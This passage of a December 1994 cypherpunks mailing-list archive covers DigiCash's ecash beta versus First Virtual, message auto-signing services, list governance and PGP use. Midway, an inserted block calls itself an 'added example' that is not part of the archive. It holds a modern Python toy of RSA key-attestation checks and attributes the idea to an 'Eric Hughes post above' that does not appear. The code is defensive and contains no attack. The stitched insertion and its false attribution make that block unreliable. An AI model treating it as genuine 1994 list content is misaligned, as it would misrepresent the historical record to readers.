At the moment we are not seeking beta testers with your kind of hardware. We will contact you when when further news happens. " I have applied three times, and received no response whatever. If you cannot manage a form letter, your business is unlikely to go anywhere. Sell or lease the patents to someone who can manage a mailing list. > So, I ask, First Virtual is looking better and better for doing > _what_? For answering their mail. For acting in accordance with their business plan. For moving money from point A to point B. Ninety percent of success is showing up on time. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at acm.org From paul at poboy.b17c.ingr.com Fri Dec 2 08:43:56 1994 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Fri, 2 Dec 94 08:43:56 PST Subject: Brands excluded from digicash beta In-Reply-To: <9412021548.AA17294@tadpole> Message-ID: <199412021638.AA19202@poboy.b17c.ingr.com> -----BEGIN PGP SIGNED MESSAGE----- > A further reply to Mr. Robichaux, who I paraphrase, "The more I > have problems with the DigiCash beta, the better First Virutal > looks." Doug, you must be talking to my dad; he's Mr. Robichaux. Having inadvertently offended the Digicash people in my previous message, let me see if I can give equal time to what's wrong with FV in this message. > Some problems with this: > 1) It is, after all, a Beta Test. Many companies limit > participation in such tests quite arbitrarily. Also, > remember, DigiCash (to the best of my knowledge) is > not going into the digital bank business itself, but > rather through licensees. 
Aside from Paul, who is very > PR oriented, it is primarily a group of quite talented > young programmers who are, while answering your letters, > trying to come out with new versions of the code. Maybe it's just me. As a beta-shop owner, I expect to have Digicash work with me when I have problems, concerns, or questions. Marcel, Paul, and others at Digicash were very helpful during the incubation period. My chief concern at this point is that there's no way for me to get paid, and no publicly available date for same. I didn't suggest that Stefan Brands, or anyone else, was being denied access to the trial. I have no evidence to suggest any explanation for his complaint, Hal Finney's, or mine-- other than that the Digicash folks are very, very busy. > 2) A group of us went over the First Virtual stuff in detail > last night over fajitas, and were practically rolling on > the floor with laughter. Basically they have an attitude > of "Crypto is too hard, people won't want to use it." So > instead, each transaction consists of an e-mail exchange > which is converted ultimately into credit card transactions > The exposure time for the merchant is on the order of _90 > days_. All fraud, etc., is on the head of the merchant. I think their attitude is that crypto's not _necessary_. I disagree; Nathaniel Borenstein has already been taken to task on www-buyinfo for that view. Their API supports TCP/IP transactions, so the mail exchange is between the FV server and the buyer. The very fact that FV has a set of terms and conditions that mention exposure time, responsibility for fraud, and so on tells me that their system is more fully fielded. I know, I know; ecash is in beta. That's fine. I still want to be able to sell things _now_. > The bottom line here is that FV has a system which is > much more sluggish than the DigiCash system, even though > it doesn't use "hard" crypto. It is far from anonymous, and > the transactions are trivially reversible. 
This is actually > a _design goal_ in their "Soylent Green", er, "Simple Green" > proposed standard. It is completely inappropriate for hard > goods of significant value, and its minimum transaction cost > is high enough to rule out its applicability for very small > transactions. Even if used for purely informational goods, > if an undercapitalized info service becomes popular, it will > sink beneath the waves while waiting for payment. All of the above is true. You can't use FV for hard goods, the minimum transaction cost rules out microtransactions, and the payment hang time is too long. On the other hand, I can't use ecash for hard goods. I have no idea what the transaction costs will be, and there's no way for sellers to get paid _at all_. > As near as I can tell, FV's technology was developed by people > who wanted to implement their pet philosophy about Internet > commerce (customer should examine info first, then commit to > paying, all transactions reversible, cryptography and anonymity > are bad, secure transactions are not possible on the net, etc.), > rather than anything bordering on an Internet cash-like system. You're right here, too. I happen to agree with the portion about allowing try-before-you-buy access; in some cases that is a very valuable way to gain market and mindshare. Remember the "Macintosh Test Drive" in 1985? > So, I ask, First Virtual is looking better and better for doing > _what_? Until they deal with the interface problem (get a decent > client, rather than relying exclusively on e-mail), I think > they're not even going to be adequate for getting shareware-scale > proceeds from putting up a cool Web page. Not. Read their web pages. There's a TCP/IP API, which I'm using. The only mail exchange is from the FV server to the customer and back again. As Hal pointed out, there are valid reasons to support systems other than the Digicash e-wallet. After all, there will be offline ecash, right? 
First Virtual's chief advantage is that I can get paid. No fooling with clearing, scalability, or anything else-- people can buy my products. - -Paul Robichaux - -- Paul Robichaux, KD4JZG | Good software engineering doesn't reduce the perobich at ingr.com | amount of work you put into a product; it just Not speaking for Intergraph. | redistributes it differently. ### http://www.intergraph.com ### -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLt9NY6fb4pLe9tolAQFYgAP8C5KfpLyvpqv5KVEquMKIKC+HOgWcOLKt dCc5sW55toRwrNBihALPFy4p40Fi8uZclIUgcNTyICnogof0WzSAnkAv+GRq8Ear ePuqqEQX0N1iWFaLlvIxVt4ALrtic4lE8O4GhE/xEl2ecBz5UR6haieGJDAhW4k4 kJZTMyAgKNI= =nDr0 -----END PGP SIGNATURE----- From rmccoy at mercury.interpath.net Fri Dec 2 09:06:57 1994 From: rmccoy at mercury.interpath.net (rmccoy at mercury.interpath.net) Date: Fri, 2 Dec 94 09:06:57 PST Subject: ECO_do Message-ID: <199412021711.MAA15082@bb.hks.net> -----BEGIN PGP MESSAGE----- Version: 2.6.2 owEBWQCm/4kARQMFAC7fVUcqGc8CJ9W3bQEBftkBgNi8riTLJAuBf/hCkbdRicFy PTPzF712eXT/MuB4TrzU97Dga24NH0ievt1kjZqZnawPYgliYWFhMTUwNzgAAAAA =7wNp -----END PGP MESSAGE----- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.] From jamesd at netcom.com Fri Dec 2 10:03:54 1994 From: jamesd at netcom.com (James A. Donald) Date: Fri, 2 Dec 94 10:03:54 PST Subject: Brands excluded from digicash beta In-Reply-To: <199412012201.AA08104@poboy.b17c.ingr.com> Message-ID: <199412021801.KAA02052@netcom8.netcom.com> Paul Robichaux writes > I'm sure that the design of a robust, usable [clearing] system > is nontrivial, and I don't mean to imply that it is. I just > don't believe that a tool the size of Fedwire and the existing > bank architectures are, or will be, required. 
The tools will be vastly simpler and smaller than Fedwire, etc but the system will be vastly larger and more complex than Fedwire etc, because "the system" will consist of many diverse people using these tools in diverse ways for diverse purposes.

Attempts to design an all encompassing well organized system run counter to the way the internet works and are therefore likely to fail.

If it does not work by spontaneous order, it probably will not work.

Regrettably, there is an obvious conflict between full and true anonymity, and spontaneous order. On the other hand, absent a centralized system, anonymity is less critical.

--
---------------------------------------------------------------------
We have the right to defend ourselves and our      |
property, because of the kind of animals that we   | James A. Donald
are. True law derives from this right, not from    |
the arbitrary power of the omnipotent state.       | jamesd at acm.org

From vvallopp at eniac.seas.upenn.edu Fri Dec 2 10:12:01 1994
From: vvallopp at eniac.seas.upenn.edu (vvallopp at eniac.seas.upenn.edu)
Date: Fri, 2 Dec 94 10:12:01 PST
Subject: ECO_do
Message-ID: <199412021817.NAA15624@bb.hks.net>

-----BEGIN PGP MESSAGE-----
Version: 2.6.2

owEBWQCm/4kARQMFAC7fZIgqGc8CJ9W3bQEB4KoBfiMUs2jPnVVoze7+Hm0GT6mc
tDTwXfvs+Wt+jhhvFql0tAC4hrVXoJ5aXlOu78g9FKwPYgliYWFhMTU2MjAAAAAA
=WGc6
-----END PGP MESSAGE-----

[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.]
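Added example, not part of any message in this archive: Eric Hughes's post above describes a pseudonym sending its key to two auto-signing servers whose own keys are vouched for by hashcodes published in a book. The Python sketch below works that through and sets it beside a checker that only looks at the form of the attestations. The server names, key bytes and toy textbook-RSA keys (built from Mersenne primes, trivially factorable) are constructed for illustration only.

```python
import hashlib

E = 65537  # public exponent shared by the toy servers (assumption of this sketch)


def make_server(name, p_exp, q_exp):
    """Toy auto-signing server: textbook RSA over two Mersenne primes.
    Constructed keys, insecure, used only to make the flow runnable."""
    p, q = (1 << p_exp) - 1, (1 << q_exp) - 1
    return {"name": name, "n": p * q, "d": pow(E, -1, (p - 1) * (q - 1))}


def public_part(server):
    return {"name": server["name"], "n": server["n"]}


def server_fingerprint(pub):
    """Hashcode of a server's public key: the value one would print in a book."""
    raw = pub["n"].to_bytes((pub["n"].bit_length() + 7) // 8, "big")
    return hashlib.sha256(raw).hexdigest()


def digest_int(key_bytes):
    return int.from_bytes(hashlib.sha256(key_bytes).digest(), "big")


def auto_sign(server, key_bytes):
    """The server fixes a bit pattern; it attests nothing about who sent it."""
    return pow(digest_int(key_bytes), server["d"], server["n"])


def signature_ok(pub, key_bytes, sig):
    return pow(sig, E, pub["n"]) == digest_int(key_bytes)


def form_only_check(attestations):
    """The 'toy checker': two things that look like signatures are attached."""
    return len(attestations) >= 2 and all(
        isinstance(sig, int) and sig > 0 for _, sig in attestations)


def check_key(key_bytes, attestations, book):
    """Accept only if every server listed in the book signed these exact bits,
    using the server key whose hashcode the book publishes."""
    problems, vouched = [], set()
    for pub, sig in attestations:
        name = pub["name"]
        if book.get(name) != server_fingerprint(pub):
            problems.append(name + ": server key is not the one published in the book")
        elif not signature_ok(pub, key_bytes, sig):
            problems.append(name + ": signature does not cover these key bits")
        else:
            vouched.add(name)
    return vouched == set(book), sorted(vouched), problems


def demo():
    a = make_server("signer-A", 521, 607)
    b = make_server("signer-B", 127, 1279)
    book = {s["name"]: server_fingerprint(public_part(s)) for s in (a, b)}

    key = b"constructed pseudonym public key bits"
    fake = b"constructed substitute key bits"
    good = [(public_part(s), auto_sign(s, key)) for s in (a, b)]

    # Substitute key presented with the genuine attestations replayed.
    replayed = check_key(fake, good, book)

    # One server's private key is misused; the other signature is replayed.
    one_bad = [(public_part(a), good[0][1]), (public_part(b), auto_sign(b, fake))]

    # A different key pair claims the name signer-A.
    rogue = make_server("signer-A", 89, 2203)
    imposter = [(public_part(rogue), auto_sign(rogue, fake)),
                (public_part(b), auto_sign(b, fake))]

    return {
        "genuine": check_key(key, good, book),
        "form_only_on_swapped_key": form_only_check(good),  # says nothing about `fake`
        "replayed": replayed,
        "one_server_compromised": check_key(fake, one_bad, book),
        "rogue_server": check_key(fake, imposter, book),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(case, result)
```

A substitute key passes only if both independent servers sign it with the keys the book vouches for, which is the sense in which two signatures make spoofing unlikely; the form-only check accepts the same attestations whatever key they are attached to.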
From cjl at welchlink.welch.jhu.edu Fri Dec 2 10:36:08 1994
From: cjl at welchlink.welch.jhu.edu (cjl)
Date: Fri, 2 Dec 94 10:36:08 PST
Subject: ECO_do
In-Reply-To: <199412021456.JAA08818@pipe1.pipeline.com>
Message-ID:

From the messages appearing on the list it would seem that responding to messages sent via Masco's auto-signer needs to be done carefully, apparently the less-than-less diligent will just respond to the From: address instead of to the automagical response demon at jya at pipeline.com

I would hate to see the valuable service provided by jya become a source of noise. In an ideal world everyone would be more careful about responding to the right address, but this is a far from ideal world. An appropriately Cypherpumpkin solution is left as an exercise to the reader.

C. J. Leonard ( / "DNA is groovy"
\ / - Watson & Crick
/ \ <-- major groove
( \ Finger for public key
\ ) Strong-arm for secret key
/ <-- minor groove Thumb-screws for pass-phrase
/ )

From abostick at netcom.com Fri Dec 2 10:36:44 1994
From: abostick at netcom.com (Alan Bostick)
Date: Fri, 2 Dec 94 10:36:44 PST
Subject: Easy-to-use signature software
Message-ID:

-----BEGIN ROT13 SIGNED MESSAGE-----

People who aren't yet able to securely use PGP to post to the cypherpunks mailing list, take heart. Eric has indicated that he doesn't care which flavor of encryption software you use. I have a user-friendly version of the encryption algorithm most widely used on the Internet. I haven't uploaded it to any FTP sites yet, but if you email me, I can send you a copy of the source code.

-----BEGIN ROT13 SIGNATURE-----
Version 2.71828

V jebgr guvf zrffntr. Abobql ryfr qvq. Nalbar jub fnlf bgurejvfr vf n yvne. Guvf uvtu-grpu qvtvgny fvtangher vf gur cebbs bs zl pynvz.

nobfgvpx at argpbz.pbz (Nyna Obfgvpx)
-----END ROT13 SIGNATURE-----

                          | For me, to be a feminist is to answer the
Alan Bostick              | question "Are women human?" with a yes.
abostick at netcom.com    |
finger for PGP public key | Katha Pollitt, REASONABLE CREATURES
Key fingerprint:          |
50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79
+legal_kludge=off

From db at Tadpole.COM Fri Dec 2 10:48:17 1994
From: db at Tadpole.COM (Doug Barnes)
Date: Fri, 2 Dec 94 10:48:17 PST
Subject: Brands excluded from digicash beta
In-Reply-To: <199412021638.AA19202@poboy.b17c.ingr.com>
Message-ID: <9412021847.AA21243@tadpole>

>
> Maybe it's just me. As a beta-shop owner, I expect to have Digicash
> work with me when I have problems, concerns, or questions. Marcel,
> Paul, and others at Digicash were very helpful during the incubation
> period. My chief concern at this point is that there's no way for me
> to get paid, and no publicly available date for same.

There have clearly been problems in communication and in expectation-setting. In particular, since DigiCash is not, to the best of my knowledge, planning on entering the US$ cash <--> ecash business themselves (instead, using licensees), it might have been a wise move for them to set expectations lower or to have taken steps to guarantee at least a trial US$ cash <--> ecash gateway.

> I think their attitude is that crypto's not _necessary_. I disagree;
> Nathaniel Borenstein has already been taken to task on www-buyinfo for
> that view. Their API supports TCP/IP transactions, so the mail
> exchange is between the FV server and the buyer.

If you've used the DigiCash clients, you know that they make it much, much easier to spend money than this e-mail confirmation system. Since they don't use crypto (and instead rely on the debatable assumption that an e-mail backchannel is secure, backed up by extreme reversibility).

This is not to say that someone couldn't remedy these problems along the same lines as DigiCash without using blind signatures or licensing from Chaum, however.
>
> The very fact that FV has a set of terms and conditions that mention
> exposure time, responsibility for fraud, and so on tells me that their
> system is more fully fielded. I know, I know; ecash is in beta. That's
> fine. I still want to be able to sell things _now_.
>

FV may be more operational, although I'm curious if any transactions have managed to fully settle yet... yes, it is important for the operator of a US$ cash->ecash gateway to consider fraud and exposure, but the _protocol_ determines that e-cash transactions are non-reversible, like putting coins into a vending machine. The gateway operator has to either use non-reversible US$ inputs, or needs to determine an acceptable level of exposure to reversible transactions.

The two systems are worlds apart in terms of where the risk is placed. FV places the risk entirely on the vendor; DigiCash places the risk entirely on the e-cash holder. Note that lots of people walk around with credit cards, bills _and_ coins in their wallets, and use them for different things throughout the day. I don't think that things are going to be that different on the net.

> On the other hand, I can't use ecash for hard goods. I have no idea
> what the transaction costs will be, and there's no way for sellers to
> get paid _at all_.

This is absolutely true, and will remain so until at least one of Chaum's licensees becomes operational.

> I happen to agree with the portion about
> allowing try-before-you-buy access; in some cases that is a very
> valuable way to gain market and mindshare. Remember the "Macintosh
> Test Drive" in 1985?

I think that if people want try before you buy, it can be done (easily) without building it into the payment protocol. I'm all for shareware, giving freebies so folks get hooked, and so forth, but it seems odd to build an unconditional rejection into the payment system, especially for products that can't be returned in any meaningful sense.

> Not. Read their web pages.
> There's a TCP/IP API, which I'm using. The
> only mail exchange is from the FV server to the customer and back
> again. As Hal pointed out, there are valid reasons to support systems
> other than the Digicash e-wallet. After all, there will be offline
> ecash, right?

I think that it is _vital_ to have e-mail and TCP/IP versions, don't get me wrong here! I _have_ read the web pages, and I note that you still have to pop into your e-mail to approve the purchase. This is an inherent flaw to the protocol, that there will be 2-3 user-side software components, instead of 1-2 with DigiCash:

FV: browsing software, paying software, confirming software
DC: browsing software, full payment software

I'm assuming that over time, the TCP/IP payment methods will be integrated into browsing software, but FV will always be hampered by the need to have something separate to handle the back-channel, since they are religiously opposed to using signatures for validation (although you suggest some progress in this area).

>
> First Virtual's chief advantage is that I can get paid. No fooling
> with clearing, scalability, or anything else-- people can buy my
> products.
>

You get paid (in ninety days), so great, use it today if you can get your users to use it. Keep your eyes open for tomorrow. You may end up getting actually paid by another method before the payments you receive today actually settle...

From anonymous-remailer at shell.portal.com Fri Dec 2 11:00:24 1994
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Fri, 2 Dec 94 11:00:24 PST
Subject: pgp / passphrase / capture / yikes!
Message-ID: <199412021900.LAA29951@jobe.shell.portal.com>

just wondering, if i use pgp on my pc, and let's say while on my unix connection to the net i shell to dos to do encryption or decryption, does this compromise my security in any way? can some admin catch my passphrase, i don't think so, but i'm really fucken paranoid!
thanks for any answers fellow punks!

-feast

oh, msg to larry detweiler: you're really looney man, cracked me up! :*)

From owner-cypherpunks at hks.net Fri Dec 2 11:02:17 1994
From: owner-cypherpunks at hks.net (owner-cypherpunks at hks.net)
Date: Fri, 2 Dec 94 11:02:17 PST
Subject: The thread that would not die. (Mandating signatures)
Message-ID: <199412021907.OAA16118@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

In article <9412021551.AA04657 at snark.imsi.com>, Perry E. Metzger wrote:
>
>John Schofield says:
>> It is silly to talk of someone "owning" the list. The list is a
>> community. The only possible owners are the people in the community. If we
>> all left, Eric would still have control over the list--but the list would be
>> worthless.
>
>It is silly to talk of someone "owning" a restaurant. The restaurant
>is a community. The only possible owners are the people in the
>community. If the patrons all left, Chef Joey would still have control
>over the restaurant -- but the restaurant would be worthless.

You continue to confuse (deliberately?) a community with the place it meets. "List" is being used in two senses -- and you continue to interpret it only as the instance of majordomo on toad.com. That's a worthless interpretation as nobody disputes that Eric controls that agent.

As far as I'm concerned, if a message has gone out to every address on the "cypherpunks" list, I don't give a shit whether or not it went through toad.com first: it went to cypherpunks.

- --
Todd Masco        | "Roam home to a dome, Where Georgian and Gothic once stood
cactus at hks.net | Now chemical bonds alone guard our blond(e)s,
cactus at bb.com  | And even the plumbing looks good." - B Fuller

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

[This message has been signed by an auto-signing service.
A valid signature means only that it has been received at the address belonging to the signature and forwarded.]

From pays at faugeres.inria.fr Fri Dec 2 11:24:08 1994
From: pays at faugeres.inria.fr (pays at faugeres.inria.fr)
Date: Fri, 2 Dec 94 11:24:08 PST
Subject: Brands excluded from digicash beta
Message-ID: <786396213.22515.0-faugeres.inria.fr*@MHS>

I just want, in a short message, to let you know that there exist some satisfied ecash testers (the system itself and the support when we set-up our digishop and our plain customers cyberwallets).

The only thing I could eventually complain about is that I even received a second (unsolicited) account Id and password to retrieve ecash software because of a bug in the requests management :-)

-- PAP

From perry at imsi.com Fri Dec 2 11:25:32 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Fri, 2 Dec 94 11:25:32 PST
Subject: The thread that would not die. (Mandating signatures)
In-Reply-To: <199412021907.OAA16118@bb.hks.net>
Message-ID: <9412021925.AA04969@snark.imsi.com>

owner-cypherpunks at hks.net says:
> Perry E. Metzger wrote:
> >
> >John Schofield says:
> >> It is silly to talk of someone "owning" the list. The list
> >> is a community. The only possible owners are the people in the
> >> community. If we all left, Eric would still have control over
> >> the list--but the list would be worthless.
> >
> >It is silly to talk of someone "owning" a restaurant. The restaurant
> >is a community. The only possible owners are the people in the
> >community. If the patrons all left, Chef Joey would still have control
> >over the restaurant -- but the restaurant would be worthless.
>
> You continue to confuse (deliberately?) a community with the place it meets.

You continue to confuse the way the mailing list functions with the people that use it.
The question of whether Eric can require that all subscribers to the list wear blue mud smeared over their faces at all times is what we are discussing -- that is, does he have proprietary control over the way the list is run. The list is run with resources he has been granted dominion over. It appears that he's completely free to take any action he likes. You are, of course, free to suggest that he not do so, and you are also free to stop using his resources in disgust.

This has been driven into the ground, so I won't continue it. However, I would suggest that all the people who think Eric doesn't have absolute control here attempt to figure out how to impose any rule or regulation without his consent, or how to stop him from implementing anything without your consent. (The fact that Eric has no interest in ruining the list and that we would prefer that he not wreck it is immaterial, by the way -- he is free to do so if he desires to, and that is what counts.)

From owner-cypherpunks at hks.net Fri Dec 2 11:25:42 1994
From: owner-cypherpunks at hks.net (owner-cypherpunks at hks.net)
Date: Fri, 2 Dec 94 11:25:42 PST
Subject: ECO_do
Message-ID: <199412021930.OAA16477@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

In article , cjl wrote:
>From the messages appearing on the list it would seem that
>responding to messages sent via Masco's auto-signer needs to be done
>carefully, apparently the less-than-less diligent will just respond to the
>From: address instead of to the automagical response demon at
>jya at pipeline.com

No longer. I removed this last night, since MUAs don't agree on what they do with "Reply-To:".

(The behavior I was trying to encourage is that of following up only to the list. Netcom lossage notwithstanding, I hate being CC'd on things that I'll see anyway.)
- --
Todd Masco        | "Roam home to a dome, Where Georgian and Gothic once stood
cactus at hks.net | Now chemical bonds alone guard our blond(e)s,
cactus at bb.com  | And even the plumbing looks good." - B Fuller

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.]

From warlord at MIT.EDU Fri Dec 2 11:27:11 1994
From: warlord at MIT.EDU (Derek Atkins)
Date: Fri, 2 Dec 94 11:27:11 PST
Subject: Cypherpunks@hks.net service
In-Reply-To: <9412021408.AA21731@yeti.bsnet>
Message-ID: <9412021926.AA19667@toxicwaste.media.mit.edu>

-----BEGIN PGP SIGNED MESSAGE-----

To: dmandl at bear.com
cc: cypherpunks at toad.com
Subject: Re: Cypherpunks at hks.net service

> No offense, but what's the point? What's next, automated key-signing
> services? Is this just intended to help people who can't sign easily

Actually, I've already written an automated key signing service. It is called PGPSign, and it uses Kerberos authentication to verify a request to sign a PGP key. It will match the Kerberos identity with the PGP UserID, and given some equivalence (which is a fuzzy thing to explain right now), it will either sign the key or refuse to sign the key.

Jeff Schiller and I have written a paper which will be presented at the Winter Usenix conference on the topic, and we plan to make the code available, once I write some documentation for it!

There is a good point to this. We are using the already-in-place Kerberos Infrastructure to generate an MIT Certification Authority. The MIT CA is a loose authorization, meaning that it assumes that only you have your password. This solves the PGP web problem of needing everyone to sign everyone else's key.
We plan to make the MIT Keysigner key widely distributed, and ask that everyone trust that key to sign other keys.

- -derek

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From owner-cypherpunks at hks.net Fri Dec 2 11:34:37 1994
From: owner-cypherpunks at hks.net (owner-cypherpunks at hks.net)
Date: Fri, 2 Dec 94 11:34:37 PST
Subject: cypherpunk signing service
Message-ID: <199412021939.OAA16569@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <199412020736.CAA10394 at bb.hks.net>, wrote:
>Does this look right?
>
>pub 384/27D5B76D 1994/12/01 Cypherpunk signing agent
> Key fingerprint = 85 BA D4 6D B8 9D B6 B7 EB 74 11 48 42 45 61 F2

Yes, that's correct.

>| I welcome any suggestions on the format of the message and the prepended
>| message.
>
>Why not stealth it and just appear as if the sender signed it?

Because the sender didn't sign it. I don't want to misrepresent what the service does. It guarantees messages have gone through cypherpunks at hks.net and, by implication, cypherpunks at toad.com. Nothing more, nothing less.

>| Thanks for y'all's comments: keep 'em coming.
>
>Good work.

Thanks!
By the way, here's the server's key, signed by me:

- - -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.7
- - -----END PGP PUBLIC KEY BLOCK-----

- -----BEGIN PGP SIGNATURE-----
Version: 2.7
- -----END PGP SIGNATURE-----

- --
Todd Masco        | "Roam home to a dome, Where Georgian and Gothic once stood
cactus at hks.net | Now chemical bonds alone guard our blond(e)s,
cactus at bb.com  | And even the plumbing looks good." - B Fuller

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.]

From andrew_loewenstern at il.us.swissbank.com Fri Dec 2 12:06:34 1994
From: andrew_loewenstern at il.us.swissbank.com (Andrew Lowenstern)
Date: Fri, 2 Dec 94 12:06:34 PST
Subject: First Virtual?
Message-ID: <9412022007.AA06523@ch1d157nwk>

FV does in fact have a bunch of e-mail addresses that will auto-forward some info sheets to you. I have attached the info to this message.

After having read Doug Barnes message (<9412021548.AA17294 at tadpole>) I'm glad I'm not the only one who thinks FV is a joke. The entire security of the system rests on the difficulty of intercepting and forging e-mail.
Forging e-mail is dead easy, intercepting isn't much harder. While the implementors are correct that an online payment-system will have to be simple to use in order to gain wide acceptance, sacrificing all security for ease of use is a grave mistake. It's just begging to be ripped off, providing people actually sell something via FV worth ripping off.

andrew

Begin forwarded message:

Where can I find out more about First Virtual?

The First Virtual GENERAL INFORMATION FAQ is the best place to start if you are looking for information about First Virtual. It provides details about all the FAQ documents available via email, and about additional information available from our anonymous FTP and Gopher servers and our World Wide Web database.

To receive a copy of the GENERAL INFORMATION FAQ, send an email message to "help at fv.com"; the GENERAL INFORMATION FAQ will be sent to you by email automatically.

You can also find a copy in other places:

* Connect to ftp.fv.com, our anonymous FTP server, and look in the directory /pub/docs for the file called "FAQ-general.txt".
* Using Mosaic, Lynx, or another World Wide Web browser, connect to our Web page using the URL "http://www.fv.com". Look for the link to the "Frequently Asked Questions" page.
Here's a summary of other First Virtual FAQ documents; to receive a copy by email, send a message to the specified address:

* 1-2-3 FAQ -- Steps for getting started -- 123 at fv.com
* SIGNUP FAQ -- Signing up for an account -- signup at fv.com
* BACKGROUND FAQ -- Our company and our vision -- background at fv.com
* BUYING FAQ -- Buying information -- buying at fv.com
* SELLING FAQ -- Selling information -- selling at fv.com
* INFOHAUS FAQ -- Using the Infohaus -- infohaus at fv.com
* SECURITY FAQ -- Security issues -- security at fv.com
* CASHFLOW FAQ -- Flow of money in our system -- cashflow at fv.com
* PROBLEMS FAQ -- Dealing with problems -- problems at fv.com

For information in languages other than English, send email to "international at fv.com".

To help us provide our services to the public at the lowest possible cost, please search the FAQs before sending email to our human operators. Thanks for understanding. And welcome to First Virtual!

From abostick at netcom.com Fri Dec 2 12:07:35 1994
From: abostick at netcom.com (Alan Bostick)
Date: Fri, 2 Dec 94 12:07:35 PST
Subject: DETWEILER IS SPOOFING US!!!
In-Reply-To: <199412020516.AA02430@bolero.rahul.net>
Message-ID:

I absolutely LOVE good agitprop. This piece had me rolling on the floor with laughter. It's even better than the alt.syntax.tactical Attack FUD--err, FAQ.

Thank you, Mr. Anonymous, your comedy has relieved a great deal of the tension, at least here.

                          | For me, to be a feminist is to answer the
Alan Bostick              | question "Are women human?" with a yes.
abostick at netcom.com    |
finger for PGP public key | Katha Pollitt, REASONABLE CREATURES
Key fingerprint:          |
50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79
+legal_kludge=off

From cactus at hks.net Fri Dec 2 12:11:53 1994
From: cactus at hks.net (cactus at hks.net)
Date: Fri, 2 Dec 94 12:11:53 PST
Subject: Disclaimer within signed body?
Message-ID: <199412022016.PAA16908@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

It's been suggested that I put my "signature disclaimer" within the signed block. There are several pluses and minuses to this, and I wanted to see what others think (As an aside, by the way, I think the aesthetics of the output are important).

As Eric pointed out to me last night, in general it's bad to modify the body of a message. I think that what I've been doing is fine, as the clear distinction between original message and additional stuff is maintained.

However: the disclaimer should really be bound to the signature. Using the "comment" block won't do this, since PGP does not use it as part of the signature. Additionally, people whose software runs the messages through PGP will never see the disclaimer if it's outside of the signed block.

What are folks' opinions on this? My options are:

- Do nothing. Memory and the general appearance of the disclaimer are enough that people won't be fooled by a message with a removed disclaimer.
- Put the disclaimer within the signature block. In essence, doing nothing as above, but that's what the comment block is there for and it might look nicer.
- Put the disclaimer at the top of the signed body. Ugly, since it immediately forces its presence in a message, but effective for the same reason.
- Put the disclaimer at the bottom of the signed body. It's still modifying the signed body, but in a much less obtrusive manner.

Input?

- --
Todd Masco        | "Roam home to a dome, Where Georgian and Gothic once stood
cactus at hks.net | Now chemical bonds alone guard our blond(e)s,
cactus at bb.com  | And even the plumbing looks good." - B Fuller

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

[This message has been signed by an auto-signing service.
A valid signature means only that it has been received at the address belonging to the signature and forwarded.]

From rishab at dxm.ernet.in Fri Dec 2 12:27:03 1994
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Fri, 2 Dec 94 12:27:03 PST
Subject: Voice over data
Message-ID:

Eric Hughes wrote:
> the great voice-over-data protocols and products introduced by
> Intel, Rockwell, ZyXEL and others at Comdex which will make
> Voice-PGP so much easier
>
> As I understand these voice-over-data products, the voice goes over
> analog, added to the modem signal. The modem signal is interpreted,
> and then reconstructed and subtracted from the incoming signal,
> leaving voice. Very clever, but insufficient for secure phones.

I don't think that's how they do it. As far as I know, most methods multiplex digitized audio with the data. One system used by some people in India provides a dynamic combination of fax, (digitized) voice and data, depending on the throughput - eg vox/9.6 data if 14.4kbps, fax as well if 19.2, etc.

While Intel and others are proposing standards, ZyXEL does it with software along with a voice card or possibly RJ11 input. A friend of mine saw a demo of it at Comdex, on an old 1496E (16.8 kbps zyxel to zyxel). The new v.34 does 28.8k - lots of room for clear digitized voice and high speed data.

This is exactly why I thought it would make secure voice easier, if not secure phones (who wants to lug a modem and PC around as a 'handset'?).

I'll be testing some Onetics Rad VFAST modems this week, which apparently do digitized voice over v.34 as well.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh        "Clean the air! clean the sky! wash the wind!
rishab at dxm.ernet.in     take stone from stone and wash them..."
rishab at arbornet.org
Voice/Fax/Data +91 11 6853410
Voicemail +91 11 3760335  H 34C Saket, New Delhi 110017, INDIA

From rishab at dxm.ernet.in Fri Dec 2 12:27:04 1994
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Fri, 2 Dec 94 12:27:04 PST
Subject: Digicash trial
Message-ID:

Geoffrey Faivre-Malloy
> DigiCash trial? Tell me more!

I got my account a couple of weeks ago, I just downloaded the software. (I'm a buyer, though I was hoping to sell too.) Recent 'shops' include HotWired. I suspect one of the problems is that the software is not 'licensed for use in the US' possibly for patent reasons? It says this clearly in the pre-download license agreement.

The trial gives you 100 dummy units of currency, which you can use to 'buy' from 'shops'.

> Now THAT sounds cool! :) Wonder how long it will be before someone uses
> PGP in a phone :) How much processing power would it take to do that on
> the fly anyway?

Actually not too much - PGP can process fast enough on a 486 as it is.

> > Now what _I_ want is some way to integrate PGP with Netscape...
> What's Netscape?

